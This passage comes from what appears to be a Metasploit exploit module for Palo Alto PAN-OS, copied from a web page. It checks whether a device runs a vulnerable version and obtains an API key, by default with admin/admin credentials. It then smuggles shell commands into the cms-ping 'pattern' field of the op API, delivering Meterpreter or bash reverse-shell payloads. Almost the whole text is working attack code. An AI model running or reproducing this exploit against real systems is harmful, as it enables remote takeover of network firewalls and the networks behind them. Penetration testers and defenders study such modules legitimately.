'Platform' => 'linux',<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux ',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'CmdStagerFlavor' => %i[echo printf],<br /> 'Type' => :linux_dropper,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),<br /> OptString.new('PASSWORD', [false, 'Password for username', 'admin'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> print_status('Authenticating...')<br /> begin<br /> @api_key = api_key<br /> rescue InvalidRequest, InvalidResponse => e<br /> return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")<br /> end<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true',<br /> 'uri' => normalize_uri(target_uri.path, 'api/'),<br /> 'vars_get' => {<br /> 'type' => 'version',<br /> 'key' => @api_key<br /> }<br /> })<br /><br /> return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body<br /><br /> version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)<br /><br /> if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||<br /> version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||<br /> version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')<br /> return Exploit::CheckCode::Appears<br /> end<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def api_key<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/'),<br /> 'vars_get' => {<br /> 'type' => 'keygen',<br /> 'user' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD']<br /> }<br /> })<br /><br /> if res.nil?<br /> raise InvalidRequest, 'Unreachable'<br /> end<br /><br /> if res.code == 401<br /> raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'<br /> end<br /><br /> if res.code == 403<br /> raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'<br /> end<br /><br /> if res.body.blank?<br /> raise InvalidResponse, 'Empty reply from server'<br /> end<br /><br /> key = res.get_xml_document.xpath('/response/result/key')&.text<br /><br /> if key.nil?<br /> raise InvalidResponse, 'Empty reply from server'<br /> end<br /><br /> print_good('Successfully obtained api key')<br /><br /> key<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/'),<br /> 'vars_get' => {<br /> 'cmd' => payload,<br /> 'type' => 'op',<br /> 'key' => @api_key<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> begin<br /> @api_key ||= api_key<br /> rescue InvalidRequest, InvalidResponse => e<br /> fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")<br /> end<br /> print_status('Exploiting...')<br /> case target['Type']<br /> when :unix_memory<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br />end<br /></code></pre>
